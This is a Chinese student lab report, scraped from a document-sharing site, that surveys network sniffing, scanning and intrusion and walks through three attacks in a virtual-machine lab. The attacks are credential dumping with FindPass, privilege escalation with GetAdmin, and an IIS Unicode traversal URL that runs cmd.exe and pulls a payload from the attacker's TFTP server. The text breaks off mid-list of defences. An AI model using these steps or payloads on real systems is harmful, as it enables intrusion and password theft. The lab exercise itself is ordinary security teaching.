- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
大连外国语大学软件学院
成绩评定:
成绩评定:
专业: 年级: 班级: 姓名: 学号:
黑客常用网络侦听、网络扫描、网络入侵方法简介
网络监听:
网络监听是一种监视网络状态、数据流程以及网络上信息传输的管理工具 ,它可以将网络界面设定成监听模式,目的是截获通信的内容,监听的手段是对协议进行分析,通过监听,可以获取用户的数据信息。
Sniffer pro就是一个完善的网络监听工具。它是一种监视网络状态、数据流程以及网络上信息传输的管理工具,它可以将网络界面设定成监听模式,并且可以截获网络上所传输的信息。
网络扫描:
主动式策略:它通过执行一些脚本文件模拟对系统进行攻击的行为并记录系 统的反应,从而发现其中的漏洞。
另一种是被动式策略。基于主机之上,对系统中不合适的设置,脆弱的口令 以及其他同安全规则抵触的对象进行检查,它通过执行一些脚本文件模拟 对系统进行攻击的行为并记录系统的反应,从而发现其中的漏洞。
网络入侵:
通常是指具有熟练地编写和调试计算机程序的技巧,并使用这些技巧来获得非法或未授权的网络或文件访问。
1、社会工程学攻击:主要包括两种方式:打电话请求密码和伪造Email
2、物理攻击:比较难防,因为攻击往往来自能够接触到物理设备的用户。
3、暴力攻击:利用字典等暴力破解密码信息。
4、利用Unicode漏洞攻击。
5、利用缓冲区溢出漏洞进行攻击。
。第一种入侵方法
2.1 方法原理
用户登录以后,所有的用户信息都存储在系统的一个进程中,这个进程是:“winlogon.exe”,将FindPass.exe传入被攻击方电脑的C盘根目录,利用FindPass等 工具,可以对“winlogon.exe”进程解码,然后获取当前用户的用户名及其密码。
2.2 入侵过程
打开虚拟机,被入侵方IP为09,入侵方IP为10,在攻击方 系统中打开cmd,输入“\\09\c$”,把findpass.exe文件拷贝到被攻击方。
在被攻击方中。打开cmd,运行该文件。得到主机名称adserver、用户名administrator、 密码123。
2.3 入侵结果 成功获取被攻击方的主机名称、用户名、密码。
第二种入侵方法
3.1 方法原理
传输方法同上,将GetAdmin.exe传入被入侵方电脑C盘根目录,利用对方系统创建普通用户:用普通用户帐号登录后,可以利用工具GetAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。
3.2 入侵过程
在虚拟机打开2个操作系统,被攻击方IP为09,攻击方IP地址为10,在攻击方打开cmd,输入\\09\c$ 把GetAdmin.exe和starAPI.dll复制到被攻击方C盘根目录。
3、在被攻击方系统中,新建一个无密码的普通用户simple。注销并且切换至simple 账户。
4、在simple用户中,打开GetAdmin 创建一个新用户hacker,打开用户,发现其隶 属于管理员组,重启并登陆。
3.3 入侵结果
成功获取对方系统的管理员身份,可进行其他攻击或者入侵操作。
第三种入侵方法
4.1 方法原理:利用Unicode漏洞
4.2 入侵过程:
打开攻击方,运行tftpd32创建本地ftp服务器。打开游览器,输入 09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+ tftp+-i+10+get+idq.dll,向tftp服务器传输idq.dll。
3输入
09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\inetpub\scriptsc
查询目录中是否有该文件
拷贝Ispc到C盘根目录下,打开cmd执行ispc.exe 09/scripts/idq.dll
成功进入被入侵方的命令提示符中。
4.3 入侵结果 成功入侵系统,可使用被入侵方系统的dos界面,执行所有操作来实现更深 入入侵。
结论
5.1网络安全危机
1、企业网站或者数据库被黑客攻击,其用非法手段对数据的使用权、删除、修改或重 发某些重要信息,以干扰用户的正常使用。
2、用户数据在有意无意中泄露或丢失。
3、网络服务系统被干扰,执行无关程序使系统响应减慢甚至瘫痪,影响用户正常的使 用,导致用户损失。
4、对网络设备及资源进行非正常使用,擅自扩大权限,越权访问信息。
5.2 网络安全防范措施
1、实时更新杀
文档评论(0)